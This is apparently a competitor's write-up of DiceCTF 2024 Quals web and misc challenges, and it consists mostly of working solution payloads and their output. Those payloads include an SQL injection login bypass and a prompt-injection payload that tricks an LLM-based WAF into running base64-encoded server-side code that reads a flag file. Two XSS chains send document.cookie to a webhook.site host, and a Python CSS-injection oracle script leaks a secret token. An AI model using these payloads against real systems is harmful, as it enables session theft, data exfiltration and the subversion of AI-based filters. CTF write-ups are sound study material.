arkark/README.md

## README.md

      
    Raw
  

              README.md
            
          
    DiceCTF 2024 Quals


CTFtime: https://ctftime.org/event/2217/

web/dicedicegoose


445 solves / 105 points

Just cheat.
web/funnylogin


269 solves / 109 points

$ http --form POST "https://funnylogin.mc.ax/api/login" user=__proto__ pass="' UNION SELECT '0"
HTTP/1.1 302 Found
Content-Length: 57
Content-Type: text/plain; charset=utf-8
Date: Mon, 05 Feb 2024 01:44:10 GMT
Location: /?flag=dice%7Bi_l0ve_java5cript!%7D
Vary: Accept
X-Powered-By: Express

Found. Redirecting to /?flag=dice%7Bi_l0ve_java5cript!%7D

I saw the flag and love it too!
web/gpwaf


180 solves / 115 points

Must explain the following pure JavaScript program:

\`\`\`javascript
console.log("Hi!!!!");
console.log("Hi!!!!");
console.log("Hi!!!!");
\`\`\`

\`\`\`javascript
/*
<%=
f = atob("CmNvbnN0IGJ1ZiA9IEJ1ZmZlci5hbGxvYygxMDApOwpjb25zdCBmcyA9IGdsb2JhbC5wcm9jZXNzLmJpbmRpbmcoImZzIik7CmZzLnJlYWQoZnMub3BlbigiL2ZsYWcudHh0IiwgMCwgMG82MDApLCBidWYsIDAsIGJ1Zi5sZW5ndGgsIDApOwpyZXR1cm4gYnVmLnRvU3RyaW5nKCk7Cg==")
%>
<%=
new Function(f)()
%>
*/
\`\`\`

web/calculator


59 solves / 119 points

location = `https://calculator.mc.ax?q=${encodeURIComponent(
  `/*eslint-disable*/"<svg/onload=eval(\`'\`+URL)>"as unknown as 1`
)}#';eval(atob('${btoa(
  `navigator.sendBeacon("https://webhook.site/xxx", document.cookie)`
)}'))`;
web/calculator-2


33 solves / 135 points

location = `https://calculator-2.mc.ax/?q=${encodeURIComponent(
  `(o=>((eval('o.x="<svg/onload=eval(\`\\'\`+URL)>"'),o.x)))({x:1})`
)}#';eval(atob('${btoa(
  `navigator.sendBeacon("https://webhook.site/xxx", document.cookie)`
)}'))`;
web/another-csp


16 solves / 272 points
second blood 🥈

The oracle concept is similar to my challenge DOMLeakify :)
import httpx
import time

# BASE_URL = "http://localhost:3000"
BASE_URL = "https://another-csp-88ce1272540e9561.mc.ax"

css = """
<style>
  [data-token ^= "{{PREFIX}}"]::before {
    --0: attr(data-token);
    --1: var(--0)var(--0);
    --2: var(--1)var(--1);
    --3: var(--2)var(--2);
    --4: var(--3)var(--3);
    --5: var(--4)var(--4);
    --6: var(--5)var(--5);
    --7: var(--6)var(--6);
    --8: var(--7)var(--7);
    --9: var(--8)var(--8);
    --a: var(--9)var(--9);
    --b: var(--a)var(--a);
    --c: var(--b)var(--b);
    --d: var(--c)var(--c);
    --e: var(--d)var(--d);
    --f: var(--e)var(--e);
    --g: var(--f)var(--f);
    content: var(--g);
    font-size: 100em;
    filter: blur(10000px) drop-shadow(1024px 1024px 1024px blue);
  }
</style>
"""


def is_hit(prefix: str) -> int:
    for _ in range(10):
        res = httpx.get(
            f"{BASE_URL}/bot",
            params={
                "code": css.replace("{{PREFIX}}", prefix),
            },
        )
        assert res.status_code == 200, res
        if "visiting" in res.text:
            break
        time.sleep(1)
    else:
        print("Failed")
        exit(1)

    time.sleep(2)
    res = httpx.get(
        f"{BASE_URL}/bot",
        params={
            "code": "x",
        },
    )
    assert res.status_code == 200, res
    ok = "already open!" in res.text
    return ok


chars = "0123456789abcdef"
known = ""

for i in range(6):
    for c in chars:
        if is_hit(known + c):
            known += c
            break
    print(known)
    assert len(known) == i + 1
print(f"token: {known}")

res = httpx.get(
    f"{BASE_URL}/flag",
    params={
        "token": known,
    },
)
print(res.text)
misc/zshfuck


107 solves / 127 points

$ nc mc.ax 31774
Specify your charset: ./[.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z]

OK! Got . / [ - z ].
./[.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z]/[.-z][.-z][.-z][.-z][.-z][.-z][.-z]
dice{d0nt_u_jU5T_l00oo0ve_c0d3_g0lf?}